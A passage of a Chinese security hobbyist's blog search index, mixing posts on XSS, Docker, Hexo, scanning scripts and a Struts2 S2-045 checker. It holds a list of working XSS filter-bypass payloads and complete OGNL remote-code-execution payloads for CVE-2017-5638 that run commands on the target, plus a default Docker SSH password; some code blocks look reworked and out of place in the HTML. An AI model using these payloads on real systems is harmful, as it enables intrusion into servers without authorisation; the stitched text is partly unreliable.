onerror="alert(1)"></div><div class="line"></div><div class="line"><body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus></div><div class="line"></div><div class="line"><img src=x onerror=alert(1)></div><div class="line"></div><div class="line"><video onerror=”javascript:alert(1)”><source></div><div class="line"></div><div class="line"><keygen autofocus 
onfocus=alert(1)></div><div class="line"></div><div class="line"><select autofocus onfocus=alert(1)></div><div class="line"></div><div class="line"><input onfocus=write(1) autofocus> chrome</div><div class="line"></div><div class="line">"><script src=data:,alert(1)<!-- 绕过浏览器</div><div class="line"></div><div class="line">常见闭合</div><div class="line"></script><script>alert(1)</script></div><div class="line"></div><div class="line">'></title><script>alert(1111)</script></div><div class="line"></div><div class="line">"><script>alert(1111)</script></div><div class="line"></div><div class="line">一些变形</div><div class="line"></script><script>alert(String.from+CharCode(88,%2083,%2083))</script></div><div class="line"></div><div class="line"><scr<script>ipt>alert('XSS');</scr</script>ipt></div><div class="line"></div><div class="line">iimgmg</div><div class="line"></div><div class="line"></div><div class="line">过滤了尖括号 括号</div><div class="line">可以使用</div><div class="line"></div><div class="line"> accesskey="X" onclick="confirm`1`"</div><div class="line">来自:</div><div class="line">http://blog.csdn.net/change518/article/details/51024706</div></pre></td></tr></table></figure>]]></content>
<tags>
<tag> web安全 </tag>
<tag> xss </tag>
</tags>
</entry>
<entry>
<title><![CDATA[10年]]></title>
<url>http://phpplay.github.io/2017/03/28/10%E5%B9%B4/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="10年后,世界会是什么样子?"><a href="#10年后,世界会是什么样子?" class="headerlink" title="10年后,世界会是什么样子?"></a>10年后,世界会是什么样子?</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">飞行器的普及</div><div class="line">智能AI的出现</div><div class="line">自动化的实现</div><div class="line">机械取代人工</div><div class="line">异地化的办公</div><div class="line">人工将会廉价</div><div class="line">智力劳作赛高</div><div class="line">资源枯寂加速</div><div class="line">中国将会崛起</div></pre></td></tr></table></figure>
<p>也许会有war</p>
<p>也许人类在经历过信息大爆炸后,会进入一个瓶颈期,这段时间会很长</p>
<p>但我们的征途是星辰大海</p>
]]></content>
<tags>
<tag> life </tag>
</tags>
</entry>
<entry>
<title><![CDATA[dnslist]]></title>
<url>http://phpplay.github.io/2017/03/26/dnslist/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="dnslist"><a href="#dnslist" class="headerlink" title="dnslist"></a>dnslist</h2><p>       前两天写了一个从dnslist采集二级域名的脚本,现在做个记录。这几天没有写,感觉好怪异,也许是因为外出了一次吧</p>
<h2 id="code"><a href="#code" class="headerlink" title="code"></a>code</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div></pre></td><td class="code"><pre><div class="line"><span class="comment">#!/usr/bin/env python</span></div><div class="line"><span class="comment"># encoding:utf-8</span></div><div class="line"><span class="keyword">import</span> requests</div><div class="line"><span class="keyword">import</span> re</div><div class="line"><span class="keyword">import</span> sys</div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">subdm_get</span><span class="params">(domain)</span>:</span></div><div class="line"> </div><div class="line"> list3 = domain.split(<span class="string">"."</span>) </div><div class="line"> sss = <span class="string">''</span></div><div class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>, list3.__len__())[::<span class="number">-1</span>]:</div><div class="line"> sss = sss +list3[i]+<span 
class="string">'/'</span> </div><div class="line"> url = <span class="string">'http://dnslist.net/'</span> + sss</div><div class="line"> r = requests.get(url)</div><div class="line"> html = r.text</div><div class="line"> a = re.findall(<span class="string">r"<a.*?href=.*?<\/a>"</span>,html)</div><div class="line"> l = []</div><div class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> a:</div><div class="line"> url2 = i[i.find(<span class="string">'>'</span>)+<span class="number">1</span>:<span class="number">-4</span>] </div><div class="line"> l.append(url2)</div><div class="line"> <span class="keyword">return</span> l</div><div class="line"> </div><div class="line"></div><div class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</div><div class="line"> <span class="keyword">if</span> len(sys.argv) == <span class="number">2</span>:</div><div class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> subdm_get(sys.argv[<span class="number">1</span>]):</div><div class="line"> <span class="keyword">print</span> i</div><div class="line"> sys.exit()</div><div class="line"> <span class="keyword">else</span>:</div><div class="line"> <span class="keyword">print</span> (<span class="string">"usage: %s domain"</span> % sys.argv[<span class="number">0</span>])</div><div class="line"> sys.exit(<span class="number">-1</span>)</div></pre></td></tr></table></figure>]]></content>
<tags>
<tag> 网络安全 </tag>
<tag> python </tag>
</tags>
</entry>
<entry>
<title><![CDATA[docker笔记]]></title>
<url>http://phpplay.github.io/2017/03/21/dockerbj/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h1 id="docker笔记"><a href="#docker笔记" class="headerlink" title="docker笔记"></a>docker笔记</h1><h2 id="1-安装"><a href="#1-安装" class="headerlink" title="1.安装"></a>1.安装</h2><p><a href="https://docs.docker.com/toolbox/toolbox_install_windows/#step-2-install-docker-toolbox" target="_blank" rel="external">https://docs.docker.com/toolbox/toolbox_install_windows/#step-2-install-docker-toolbox</a></p>
<p>注意:配置用户文件夹下的.bash_profile文件<br>内容为<br>export MACHINE_STORAGE_PATH='D:\docker'</p>
<p>注意:不管是安装还是后面的新建,基本上似乎都需要使用 admin 权限</p>
<h2 id="2-新建"><a href="#2-新建" class="headerlink" title="2.新建"></a>2.新建</h2><p>修改start.sh<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">"${DOCKER_MACHINE}" -s "D:\docker" create --engine-registry-mirror=https://docker.mirrors.ustc.edu.cn --virtualbox-hostonly-cidr "192.168.233.1/24" -d virtualbox $PROXY_ENV "${VM}"</div></pre></td></tr></table></figure></p>
<p>在bash 使用admin权限 运行start.sh第一次可能会说没用iso文件,所以把你安装文件夹下的 boot2docker.iso 复制到 d:\docker\cache (自定义) 文件夹后,再运行start.sh就好了</p>
<p>新建命令:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">dm -s "D:\docker" create --engine-registry-mirror=https://docker.mirrors.ustc.edu.cn --virtualbox-hostonly-cidr "192.168.233.1/24" -d virtualbox whoami</div></pre></td></tr></table></figure></p>
<p>-s 指定文件位置<br>--engine-registry-mirror 修改为国内源</p>
<p>-d virtualbox 指定vbox</p>
<p>环境变量设置</p>
<p>docker-machine env 你建的名字</p>
<p>执行返回来的最后一条语句,就可以把docker与之关联</p>
<p>docker run hello-world 测试是否可以运行</p>
<p>docker info docker 的详细信息</p>
<p>可以通过 ssh 登录 docker,user:docker,pass:tcuser</p>
<h2 id="3-镜像"><a href="#3-镜像" class="headerlink" title="3.镜像"></a>3.镜像</h2><p>docker build 不太会用,新建镜像的意思</p>
<p>docker pull ysrc/xunfeng 下载镜像</p>
<p>sudo docker run -d -p 8000:80 -v /opt/data ysrc/xunfeng:latest 运行镜像在8000端口</p>
<p>docker images 查看镜像</p>
<p>docker ps 查看运行中的镜像</p>
<p>docker ps 会显示image的运行ID 巡风有600+M</p>
<p>docker stop id</p>
]]></content>
<tags>
<tag> docker </tag>
<tag> linux </tag>
</tags>
</entry>
<entry>
<title><![CDATA[docker]]></title>
<url>http://phpplay.github.io/2017/03/20/docker/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="docker"><a href="#docker" class="headerlink" title="docker"></a>docker</h2><p>       醉了,今天研究了一天的docker,我就不该让它运行在windows中,这是个错误啊,各种配置问题,各种解决。最后只汇聚成了一句精华<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">dm -s "D:\docker list" create --engine-registry-mirror=https://docker.mirrors.ustc.edu.cn --virtualbox-hostonly-cidr "192.168.233.1/24" -d virtualbox xxx</div></pre></td></tr></table></figure></p>
<p>       PS:老版本的docker真心不好用,其实原理就是简易的vbox么。</p>
<h2 id="docker漏洞相关"><a href="#docker漏洞相关" class="headerlink" title="docker漏洞相关"></a>docker漏洞相关</h2><p>现在的docker虚拟化才兴起,所以漏洞还是有一些的,找到一个相关的<a href="http://www.cnblogs.com/hanyifeng/p/5526799.html" target="_blank" rel="external">漏洞</a>,虚拟化这一片的洞也不少啊,还有就是git上有一些,比如CVE-2016-5195,都是用来逃逸的POC</p>
<p>代码git上就有<a href="https://github.com/gebl/dirtycow-docker-vdso" target="_blank" rel="external">code</a>.</p>
<h2 id="优点"><a href="#优点" class="headerlink" title="优点"></a>优点</h2><p>       它最大的优点就是方便,各种环境的快速部署,真心快。</p>
]]></content>
<tags>
<tag> docker </tag>
</tags>
</entry>
<entry>
<title><![CDATA[hexo]]></title>
<url>http://phpplay.github.io/2017/03/16/hexo/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="hexo基础命令"><a href="#hexo基础命令" class="headerlink" title="hexo基础命令"></a>hexo基础命令</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">hexo init 初始化</div><div class="line">hexo g 生成</div><div class="line">hexo s 本地服务</div><div class="line">hexo d 上传</div><div class="line">hexo clean 清除 public 用于增删改之后</div><div class="line">hexo new draft "new draft" 草稿功能(私密文章,不过放到git上也无所谓了)</div><div class="line">hexo publish 草稿变成文章</div></pre></td></tr></table></figure>
<h2 id="hexo基本语法"><a href="#hexo基本语法" class="headerlink" title="hexo基本语法"></a>hexo基本语法</h2><p><strong>重要的事情说三遍</strong>,hexo上到处都要<strong>2个空格</strong>,不同于一般的markdown<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">\#\# 标题</div><div class="line">tags 分类 多个请使用[]</div><div class="line">缩进的话可以使用&\#160; &\#160; &\#160; &\#160; 来空两格</div></pre></td></tr></table></figure></p>
]]></content>
<tags>
<tag> hexo </tag>
</tags>
</entry>
<entry>
<title><![CDATA[目录扫描脚本]]></title>
<url>http://phpplay.github.io/2017/03/16/nscan/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="学习"><a href="#学习" class="headerlink" title="学习"></a>学习</h2><p>       一直想搞一个批量扫描工具,最近试着写一下扫描struts2,所以打算自己写一个,于是就有了这个demo。 </p>
<h3 id="我的demo"><a href="#我的demo" class="headerlink" title="我的demo"></a>我的demo</h3><p>       这次不再用urllib2了,因为301,302自动跳转问题有些蛋疼 -、-,所以用了requests,第一次用,我语法都没学完,直接写到昨晚2点多。因为自定义404的问题实在是不好判断,所以就找了些资料,思路大概就是再访问一个根本不可能存在的路径,把它的返回内容和原扫描路径的返回内容做比较,如果相似度大于80%,就直接舍弃。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">if</span> r.status_code == <span class="number">200</span> <span class="keyword">and</span> l1 != l2 <span class="keyword">and</span> <span class="string">'type'</span> <span class="keyword">in</span> r.text <span class="keyword">and</span> difflib.SequenceMatcher(<span class="keyword">None</span>, r2.text,r.text).ratio() < <span class="number">0.8</span></div></pre></td></tr></table></figure>
<pre><code>我使用了多个判断条件:首先是状态码,然后是文件长度,'type' in 是为了判断返回内容是否是html,最后一个是判断文本相似度。
完整的模块代码如下:
</code></pre><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div></pre></td><td class="code"><pre><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">action_scan</span><span class="params">(url)</span>:</span></div><div class="line"> dirs = [<span class="string">"index.action"</span>,<span class="string">"home.action"</span>,<span class="string">"login.action"</span>,<span class="string">"main.action"</span>,<span class="string">"homepage.action"</span>]</div><div class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">5</span>):</div><div class="line"> furl = <span class="string">'http://'</span> + url + <span class="string">':8080/'</span> + dirs[i]</div><div class="line"> <span class="keyword">try</span>:</div><div class="line"> r = requests.get(furl,allow_redirects = <span class="keyword">False</span>,timeout=<span class="number">3</span>)</div><div class="line"> l1 = len(r.text)</div><div class="line"> r2 = requests.get(furl+<span class="string">'233323332333'</span>,allow_redirects = <span class="keyword">False</span>,timeout=<span class="number">3</span>)</div><div class="line"> l2 = len(r2.text)</div><div class="line"> <span class="keyword">if</span> r.status_code == <span class="number">200</span> <span class="keyword">and</span> l1 != l2 <span class="keyword">and</span> 
<span class="string">'type'</span> <span class="keyword">in</span> r.text <span class="keyword">and</span> difflib.SequenceMatcher(<span class="keyword">None</span>, r2.text,r.text).ratio() < <span class="number">0.8</span>:</div><div class="line"> </div><div class="line"> <span class="keyword">print</span> furl + <span class="string">' is ok'</span></div><div class="line"> file_object = open(<span class="string">'ok.txt'</span>, <span class="string">'a'</span>)</div><div class="line"> file_object.write(furl + <span class="string">'\n'</span>)</div><div class="line"> file_object.close()</div><div class="line"> <span class="keyword">else</span>:</div><div class="line"> <span class="keyword">print</span> furl + <span class="string">' is not ok'</span></div><div class="line"></div><div class="line"> </div><div class="line"> <span class="keyword">except</span> :</div><div class="line"> <span class="keyword">pass</span></div></pre></td></tr></table></figure>
<h3 id="反思"><a href="#反思" class="headerlink" title="反思"></a>反思</h3><p>       其实如果我只扫struts2的话,只要有一个可以判断的指纹就可以了,搞得这么复杂,我也是醉了,不过这个demo稍微改一下就可以变成一个web目录扫描了,至少它扫描struts2准确性很高了 </p>
<p>       接下来打算学习线程,顺便把语法补上来,否则根基太渣,容易垮掉啊。 </p>
]]></content>
<tags>
<tag> 网络安全 </tag>
<tag> python </tag>
</tags>
</entry>
<entry>
<title><![CDATA[python判断网络文件类型测试脚本]]></title>
<url>http://phpplay.github.io/2017/03/14/test/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="测试"><a href="#测试" class="headerlink" title="测试"></a>测试</h2><p>       当时想起土司一个帖子,是通过文件头判断下载文件类型的思路来做一个挖掘姬,所以就想用python写一个,所以做了些测试。</p>
<h3 id=""><a href="#" class="headerlink" title=" "></a> </h3><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div 
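import struct  # kept from the original listing; nothing below uses it

# The original targets Python 2 (urllib2). This shim keeps the script
# runnable unchanged on Python 3 as well.
try:
    from urllib2 import urlopen, URLError
except ImportError:  # Python 3
    from urllib.request import urlopen
    from urllib.error import URLError

# Download target of the original experiment. The double extension
# (.lnk.lnk) is presumably the point of the test: the file name says nothing
# reliable about the content, so the leading bytes are inspected instead.
DEFAULT_URL = 'http://127.0.0.1:8081/test.lnk.lnk'

# The longest signature in typeList() is 4 bytes (8 hex digits); read exactly
# that many so every entry can be matched. The original read only 3 bytes and
# compared them against hand-shortened 6-digit constants, so typeList() was
# never actually consulted and a 4-byte signature could never match.
MAGIC_LEN = 4


def typeList():
    """Return the known file signatures: uppercase hex magic -> type name."""
    return {"52617221": "rar", "504B0304": "zip"}


def toHex(s):
    """Hex-encode a sequence of bytes or one-character strings.

    Accepts a Python 2 str, a Python 3 bytes object, or any iterable of ints
    / single characters. Output is lowercase, two digits per byte; callers
    that need uppercase call .upper() on it, as the original did.
    An empty input yields "" instead of the TypeError reduce() raised.
    """
    parts = []
    for ch in s:
        value = ch if isinstance(ch, int) else ord(ch)
        parts.append("%02x" % value)
    return "".join(parts)


def detectType(head):
    """Map the leading bytes of a file to a type name from typeList().

    Returns the matching type name, or None when no known signature is a
    prefix of ``head``. Only the first bytes are compared, so this says what
    the file *starts* like, not that the rest is well-formed: an archive
    appended to an image (a polyglot) still matches here, so do not treat a
    match as proof that the content is safe.
    """
    hexHead = toHex(head).upper()
    for magic, name in typeList().items():
        if hexHead.startswith(magic):
            return name
    return None


def main(url=DEFAULT_URL, timeout=5):
    """Fetch ``url``, sniff its leading bytes and print the detected type.

    Prints 'rar' / 'zip' / 'wu' exactly as the original did, but reports
    network errors instead of swallowing them with a bare ``pass``, and
    always closes the response. Returns the detected type name or None.
    """
    try:
        response = urlopen(url, timeout=timeout)
    except URLError as e:
        # HTTPError is a subclass of URLError, so 4xx/5xx replies land here
        # too; the original silently dropped all of them.
        print("Failed to reach %s: %s" % (url, getattr(e, "reason", e)))
        return None
    try:
        print(response.getcode())
        head = response.read(MAGIC_LEN)
    finally:
        response.close()
    print(toHex(head).upper())
    kind = detectType(head)
    print(kind if kind is not None else "wu")
    return kind


if __name__ == "__main__":
    main()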
<h3 id="其它测试数据"><a href="#其它测试数据" class="headerlink" title="其它测试数据"></a>其它测试数据</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div></pre></td><td class="code"><pre><div class="line">JPEG (jpg) FFD8FF</div><div class="line">PNG (png) 89504E47</div><div class="line">GIF (gif) 47494638</div><div class="line">TIFF (tif) 49492A00</div><div class="line">Windows Bitmap (bmp) 424D</div><div class="line">CAD (dwg) 41433130</div><div class="line">Adobe Photoshop (psd) 38425053</div><div class="line">Rich Text Format (rtf) 7B5C727466</div><div class="line">XML (xml) 3C3F786D6C</div><div class="line">HTML (html) 68746D6C3E</div><div class="line">Email [thorough only] (eml) 44656C69766572792D646174653A</div><div class="line">Outlook Express (dbx) CFAD12FEC5FD746F</div><div class="line">Outlook (pst) 2142444E</div><div class="line">MS Word/Excel (xls.or.doc) D0CF11E0</div><div class="line">MS Access (mdb) 5374616E64617264204A</div><div class="line">WordPerfect (wpd) FF575043</div><div class="line">Postscript (eps.or.ps) 252150532D41646F6265</div><div class="line">Adobe Acrobat (pdf) 255044462D312E</div><div class="line">Quicken (qdf) AC9EBD8F</div><div class="line">Windows 
Password (pwl) E3828596</div><div class="line">ZIP Archive (zip) 504B0304</div><div class="line">RAR Archive (rar) 52617221</div><div class="line">Wave (wav) 57415645</div><div class="line">AVI (avi) 41564920</div><div class="line">Real Audio (ram) 2E7261FD</div><div class="line">Real Media (rm) 2E524D46</div><div class="line">MPEG (mpg) 000001BA</div><div class="line">MPEG (mpg) 000001B3</div><div class="line">Quicktime (mov) 6D6F6F76</div><div class="line">Windows Media (asf) 3026B2758E66CF11</div><div class="line">MIDI (mid) 4D546864</div></pre></td></tr></table></figure>
<h3 id="测试区"><a href="#测试区" class="headerlink" title="测试区"></a>测试区</h3><div class="owl-media owl-video owl-bilibili"><embed src="http://static.hdslb.com/miniloader.swf" flashvars="aid=247371&page=1" pluginspage="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" quality="high" allowfullscreen="true"></div>
<div id="aplayer0" class="aplayer" style="margin-bottom: 20px;"></div>
<script>
// Audio player for the "测试区" (test area) section.
// NOTE(review): both media URLs are plain http://; if this page is served
// over https they will be treated as mixed content and may be blocked.
(function () {
  var playerOptions = {
    element: document.getElementById("aplayer0"),
    narrow: false,
    autoplay: false,
    showlrc: 0,
    music: {
      title: "她的睫毛",
      author: "周杰伦",
      url: "http://home.ustc.edu.cn/~mmmwhy/%d6%dc%bd%dc%c2%d7%20-%20%cb%fd%b5%c4%bd%de%c3%ab.mp3",
      pic: "http://home.ustc.edu.cn/~mmmwhy/jay.jpg"
    }
  };
  new APlayer(playerOptions);
})();
</script>
<embed height="415" width="544" quality="high" allowfullscreen="true" type="application/x-shockwave-flash" src="//static.hdslb.com/miniloader.swf" flashvars="aid=9057376&page=1" pluginspage="//www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash">
]]></content>
<tags>
<tag> 网络安全 </tag>
<tag> python </tag>
</tags>
</entry>
<entry>
<title><![CDATA[关于struts2-045漏洞的脚本编写]]></title>
<url>http://phpplay.github.io/2017/03/14/whoami/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="始末"><a href="#始末" class="headerlink" title="始末"></a>始末</h2><p>struts2-045 漏洞(S2-045,CVE-2017-5638)是在 2017 年 3 月 7 日被安恒放出的,而很多公司在一个月以前就已经收到通知,所以内部圈子里很早就开始研究了。PoC 在 3 月 7 日当天被放出来,批量检测工具也很快被各黑阔论坛开发出来;不过这个时间段很敏感,所以没爆出什么大新闻。<br>当时自己闲着没事也写了一个检测用的 DEMO,还是很简单的,顺便还认识了一个很好用的工具 <a href="https://www.getpostman.com/" target="_blank" rel="external noopener">postman</a>。<br>需要注意的是,下面的“检测”并不是被动探测:payload 通过 OGNL 表达式在目标服务器上调用 java.lang.ProcessBuilder 执行 <code>echo 11987654321</code>,再把命令输出写回响应,本质上已经是远程代码执行,只能对获得授权的目标使用;修复方式是升级到已修补该漏洞的 Struts 版本。</p>
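"""Minimal Struts2 S2-045 (CVE-2017-5638) check, reworked from the DEMO.

WARNING: the Content-Type payload below is not a passive probe. It makes the
target run an OS command (``echo 11987654321``) through
java.lang.ProcessBuilder and copy the output into the HTTP response; that is
remote code execution, so point it only at systems you are authorised to
test. A host is reported as vulnerable when the echoed marker appears in the
response body.
"""
import sys

try:  # Python 2, as in the original listing
    from urllib2 import Request, urlopen, URLError, HTTPError
except ImportError:  # Python 3
    from urllib.request import Request, urlopen
    from urllib.error import URLError, HTTPError

# Placeholder target from the original; pass a real URL to check() or argv.
DEFAULT_URL = "http://text.com/index.action"

USER_AGENT = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"

# Value the payload echoes back; its presence in the body is the signal.
MARKER = "11987654321"

# OGNL expression smuggled through the multipart Content-Type header,
# kept byte-for-byte from the original demo.
PAYLOAD = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo 11987654321').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"


def build_request(url):
    """Build the request that carries the S2-045 payload in Content-Type."""
    req = Request(url)
    req.add_header('User-agent', USER_AGENT)
    req.add_header('Content-Type', PAYLOAD)
    return req


def response_indicates_vuln(body):
    """Return True when the echoed marker appears in ``body`` (str or bytes)."""
    if isinstance(body, bytes) and not isinstance(body, str):  # Python 3 bytes
        body = body.decode("utf-8", "replace")
    return MARKER in body


def check(url=DEFAULT_URL, timeout=10):
    """Send the probe to ``url``; return True if the marker comes back.

    The original let a non-2xx reply raise HTTPError and crash before the
    body was examined, and sent the request with no timeout. Here a 4xx/5xx
    reply is still read, since its body may carry the command output, and
    any other URLError is reported and counted as "not confirmed".
    """
    req = build_request(url)
    try:
        res = urlopen(req, timeout=timeout)
    except HTTPError as e:
        res = e  # HTTPError is file-like; its body is still readable
    except URLError as e:
        print("%s: request failed (%s)" % (url, getattr(e, "reason", e)))
        return False
    try:
        body = res.read()
    finally:
        res.close()
    vulnerable = response_indicates_vuln(body)
    if vulnerable:
        print(url + " is OK")
    return vulnerable


if __name__ == "__main__":
    check(sys.argv[1] if len(sys.argv) > 1 else DEFAULT_URL)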
# Variant of the S2-045 probe that makes the target echo its own web root
# (getRealPath('/')) instead of a fixed marker. `req` is the urllib2.Request
# built in the DEMO above; this snippet only swaps in the two headers.
# NOTE(review): this still runs a command through ProcessBuilder on the
# target, so it is every bit as invasive as the first payload.
_path_probe_headers = [
    ('User-agent', "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"),
    ('Content-Type', "%{(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#luan='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#path=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest').getSession().getServletContext().getRealPath('/')).(#cmd='echo '+#path).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"),
]
for _name, _value in _path_probe_headers:
    req.add_header(_name, _value)
<h3 id="getshell"><a href="#getshell" class="headerlink" title="getshell"></a>getshell</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">自己百度吧</div></pre></td></tr></table></figure>]]></content>
<tags>
<tag> 网络安全 </tag>
<tag> python </tag>
</tags>
</entry>
<entry>
<title><![CDATA[Hello World]]></title>
<url>http://phpplay.github.io/2017/03/14/hello-world/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><pre><code>时隔一年,又开始写blog了,这次能坚持多久?
</code></pre>]]></content>
</entry>
</search>